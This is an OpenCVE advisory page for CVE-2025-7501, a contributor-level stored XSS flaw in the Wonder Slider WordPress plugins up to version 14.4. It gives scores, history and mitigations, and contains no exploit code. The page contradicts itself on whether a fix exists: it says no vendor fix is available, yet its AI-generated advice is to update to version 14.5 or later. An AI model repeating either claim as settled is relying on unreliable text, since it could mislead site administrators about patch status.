Description
The Wonder Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image title and description DOM in all versions up to, and including, 14.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-07-26
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting (XSS) that allows an authenticated user to inject scripts into any page viewed by site visitors.
Action: Patch
AI Analysis

Impact

The vulnerability arises from the Wonder Slider plugin’s lack of proper input sanitization and output escaping for image titles and descriptions. An authenticated user with Contributor or higher privileges can embed arbitrary JavaScript that will be stored and rendered on any page containing the injected content. This stored XSS can lead to session hijacking, defacement, or theft of sensitive data viewed by other users when they navigate to the affected pages.

Affected Systems

The affected products are Wonder Slider and Wonder Slider Lite, as provided by the vendor wonderplugin. All released versions up to and including 14.4 are vulnerable. The flaw exists in the image handling code of the plugin and affects any WordPress site that deploys these plugins in a version ≤ 14.4.

Risk and Exploitability

The CVSS score of 6.4 marks the flaw as moderate severity. The EPSS score of less than 1% indicates exploitation probability is currently low, and the vulnerability is not listed in the CISA KEV catalog. However, because the attack requires authenticated Contributor-level access, any site that authorizes contributors to edit slider content could be compromised by a malicious insider or over‑privileged user. The exploit path is straightforward: an authenticated attacker creates or edits a slider image title/description with malicious payload, which is then persisted and executed for all users when the page is rendered.

Generated by OpenCVE AI on April 21, 2026 at 03:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Wonder Slider and Wonder Slider Lite to the latest version (≥ 14.5) to remove the input validation flaw.
  • If an update cannot be applied immediately, revoke Contributor permissions for users who do not need edit rights or restrict the ability to edit image titles and descriptions in the slider settings.
  • Implement a CSP policy that blocks inline script execution or use a WAF rule to detect and block stored XSS payloads in slider content.

Generated by OpenCVE AI on April 21, 2026 at 03:49 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-22787 The Wonder Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image title and description DOM in all versions up to, and including, 14.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Mon, 28 Jul 2025 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 28 Jul 2025 13:00:00 +0000

Type Values Removed Values Added
First Time appeared Wonderplugin
Wonderplugin wonder Slider Lite
Wordpress
Wordpress wordpress
Vendors & Products Wonderplugin
Wonderplugin wonder Slider Lite
Wordpress
Wordpress wordpress

Sat, 26 Jul 2025 07:00:00 +0000

Type Values Removed Values Added
Description The Wonder Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image title and description DOM in all versions up to, and including, 14.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title Wonder Slider Lite & Wonder Slider <= 14.4 - Authenticated (Contributor+) Dom-based Stored Cross-Site Scripting
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Wonderplugin Wonder Slider Lite
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:45:15.000Z

Reserved: 2025-07-11T18:04:54.573Z

Link: CVE-2025-7501

cve-icon Vulnrichment

Updated: 2025-07-28T15:52:35.708Z

cve-icon NVD

Status : Deferred

Published: 2025-07-26T07:15:26.093

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-7501

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-21T04:00:10Z

Weaknesses